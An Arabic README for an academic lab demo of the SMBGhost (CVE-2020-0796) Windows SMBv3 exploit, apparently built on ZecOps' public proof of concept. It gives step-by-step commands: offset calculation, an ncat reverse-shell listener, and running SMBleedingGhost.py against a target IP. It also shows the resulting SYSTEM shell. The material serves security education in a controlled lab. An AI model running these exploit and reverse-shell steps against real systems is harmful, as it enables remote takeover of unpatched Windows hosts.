استغلال إثبات مفهوم تعليمي لـ CVE-2020-0796 (SMBGhost) يوضح تنفيذ التعليمات البرمجية عن بُعد قبل المصادقة على Windows SMBv3. يتضمن إعداد مختبر خطوة بخطوة وحساب الإزاحة وتنفيذ قشرة عكسية للتدريب الأمني الخاضع للتحكم.
يعرض هذا المشروع إكسبلويت إثبات المفهوم (PoC) لثغرة CVE-2020-0796، المعروفة أيضًا باسم SMBGhost - وهي ثغرة حرجة لتنفيذ الكود عن بُعد (RCE) قبل المصادقة، تؤثر على أنظمة Windows 10 وWindows Server التي تستخدم SMBv3. تم تطوير هذا المشروع كجزء من مشروع أكاديمي في مجال الأمن السيبراني. يعود الفضل في كود الاستغلال بالكامل إلى ZecOps. لقد استخدمته وكيّفته فقط لأغراض تعليمية لعرض استغلال CVE-2020-0796 داخل بيئة مختبرية خاضعة للتحكم.
لإعادة إنتاج هذا العرض التوضيحي، يلزم الإعداد التالي:
SMBleedingGhost.py بواسطة ZecOpscalc_target_offsets.batافتح موجه الأوامر على كل من الجهازين الافتراضيين المهاجم والهدف.
نفّذ الأمر التالي على كل جهاز:
ipconfig
CVE-2020-0796-RCE-POC-master.calc_target_offsets.batCVE-2020-0796-RCE-POC-master.SMBleedingGhost.py وافتحه باستخدام المفكرة (Notepad).SMBleedingGhost.py، مرر لأسفل وحدد موقع القسم الذي يبدأ بـ OFFSETS = {.افتح موجه أوامر جديدًا ونفّذ:
ncat -lvp 4321
4321 لاستقبال قشرة عكسية من الجهاز الهدف عند نجاح الاستغلال.cd Desktop
cd CVE-2020-0796-RCE-POC-master
dir
python SMBleedingGhost.py <target_ip> <attacker_ip> <port>
مثال مستخدم في هذا العرض التوضيحي:
python SMBleedingGhost.py 192.168.18.61 192.168.18.62 4321
192.168.18.61: عنوان IP للجهاز الهدف192.168.18.62: عنوان IP لجهاز المهاجم4321: المنفذ المستخدم في مستمع Netcatإذا نجح الاستغلال، ستظهر نافذة Netcat:
Microsoft Windows [Version 10.0.18362.356]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
مما يؤكد أن:
يمكنك التحقق من الوصول عن طريق تنفيذ:
whoami
وهذا سيعطي:
whoami
nt authority\system
هذا يعني أن جهاز المهاجم يمتلك الآن صلاحيات على مستوى النظام على الجهاز الهدف.
يمكنك أيضًا تشغيل:
ipconfig
للتحقق من أنك تتفاعل مع شبكة الجهاز الهدف.

ملاحظة: قد يتعطل الجهاز الهدف بعد الاستغلال. إذا حدث ذلك، يمكنك إعادة تشغيله. ستحتاج جلسة المهاجم إلى إعادة إنشائها بعد إعادة التشغيل.
يعتمد هذا العرض التوضيحي على إثبات المفهوم المتاح للعموم الذي طوّره ZecOps.
يعود الفضل في كود الاستغلال بالكامل إلى ZecOps. لقد استخدمته وكيّفته فقط لأغراض تعليمية لعرض استغلال CVE-2020-0796 داخل بيئة مختبرية خاضعة للتحكم.
تم إنشاء هذا المستودع لأغراض تعليمية فقط.
جميع الأدوات والنصوص البرمجية والتقنيات المعروضة تهدف إلى المساعدة في فهم الثغرات في مجال الأمن السيبراني في بيئة مختبرية خاضعة للتحكم. لا تحاول استخدام أي من المواد المقدمة على أنظمة أو شبكات لا تملكها أو ليس لديك إذن صريح لاختبارها.
لا يتحمل المؤلف أي مسؤولية عن سوء استخدام البرنامج.